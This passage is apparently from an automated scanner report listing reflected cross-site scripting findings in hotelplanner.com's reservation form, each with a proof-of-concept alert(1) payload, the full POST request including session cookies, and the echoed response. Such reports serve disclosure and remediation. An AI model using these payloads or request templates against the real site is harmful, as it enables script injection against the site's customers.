The value 93267a--><img src=a onerror=alert(1)>1be035142f8 cannot be converted to a number. <br>
...[SNIP]...
4.281. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the arrivalYear request parameter is copied into an HTML comment. The payload 4989e--><img%20src%3da%20onerror%3dalert(1)>16d875515cb was submitted in the arrivalYear parameter. This input was echoed as 4989e--><img src=a onerror=alert(1)>16d875515cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=20114989e--><img%20src%3da%20onerror%3dalert(1)>16d875515cb&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C4
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:34:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/4/20114989e--><img src=a onerror=alert(1)>16d875515cb is an invalid date or time string. <br>
...[SNIP]...
4.282. https://www.hotelplanner.com/Accept/Reserve.cfm [bedType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the bedType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60402"><script>alert(1)</script>90037396956 was submitted in the bedType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
geRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=1460402"><script>alert(1)</script>90037396956&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fa
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:08 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58859

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="bedType1" value="1460402"><script>alert(1)</script>90037396956">
...[SNIP]...
4.283. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the bedTypes request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb17d"><script>alert(1)</script>4c2a6b371af was submitted in the bedTypes parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
mediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bedeb17d"><script>alert(1)</script>4c2a6b371af&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometim
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:04 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="bedTypes" value="14|King Bedeb17d"><script>alert(1)</script>4c2a6b371af">
...[SNIP]...
4.284. https://www.hotelplanner.com/Accept/Reserve.cfm [bedTypes parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the bedTypes request parameter is copied into the HTML document as plain text between tags. The payload 33d6d<script>alert(1)</script>79da41cdb8a was submitted in the bedTypes parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
mediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed33d6d<script>alert(1)</script>79da41cdb8a&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometim
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:05 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<option selected value="14">King Bed33d6d<script>alert(1)</script>79da41cdb8a</option>
...[SNIP]...
4.285. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the cancellationPolicy request parameter is copied into the HTML document as plain text between tags. The payload 78796<script>alert(1)</script>9d816f4ad0 was submitted in the cancellationPolicy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
+after+4%3A00+PM+%28%28GMT-05%3A00%29+Eastern+Time+%28US+%26+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.78796<script>alert(1)</script>9d816f4ad0&hotelID=113791&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTON&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:32 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58904

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
lations or changes made after 4:00 PM ((GMT-05:00) Eastern Time (US & Canada)) on Oct 3, 2011 are subject to a 1 Night Room & Tax penalty. The property makes no refunds for no shows or early checkouts.78796<script>alert(1)</script>9d816f4ad0</font>
...[SNIP]...
4.286. https://www.hotelplanner.com/Accept/Reserve.cfm [cancellationPolicy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the cancellationPolicy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d91c7"><script>alert(1)</script>16f2b4b9db2 was submitted in the cancellationPolicy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
+after+4%3A00+PM+%28%28GMT-05%3A00%29+Eastern+Time+%28US+%26+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.d91c7"><script>alert(1)</script>16f2b4b9db2&hotelID=113791&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTON&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:30 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
lations or changes made after 4:00 PM ((GMT-05:00) Eastern Time (US & Canada)) on Oct 3, 2011 are subject to a 1 Night Room & Tax penalty. The property makes no refunds for no shows or early checkouts.d91c7"><script>alert(1)</script>16f2b4b9db2">
...[SNIP]...
4.287. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTaxesAndFees parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the chargeableRoomRateTaxesAndFees request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2848"><script>alert(1)</script>635379cc061 was submitted in the chargeableRoomRateTaxesAndFees parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99f2848"><script>alert(1)</script>635379cc061&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&prom
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58862

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="chargeableRoomRateTaxesAndFees" value="205.99f2848"><script>alert(1)</script>635379cc061">
...[SNIP]...
4.288. https://www.hotelplanner.com/Accept/Reserve.cfm [chargeableRoomRateTotal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the chargeableRoomRateTotal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f77f"><script>alert(1)</script>c726a0130fc was submitted in the chargeableRoomRateTotal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.21f77f"><script>alert(1)</script>c726a0130fc&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRe
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="chargeableRoomRateTotal" value="1434.21f77f"><script>alert(1)</script>c726a0130fc">
...[SNIP]...
4.289. https://www.hotelplanner.com/Accept/Reserve.cfm [departureDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the departureDay request parameter is copied into an HTML comment. The payload 4d76d--><img%20src%3da%20onerror%3dalert(1)>602f13b20c8 was submitted in the departureDay parameter. This input was echoed as 4d76d--><img src=a onerror=alert(1)>602f13b20c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
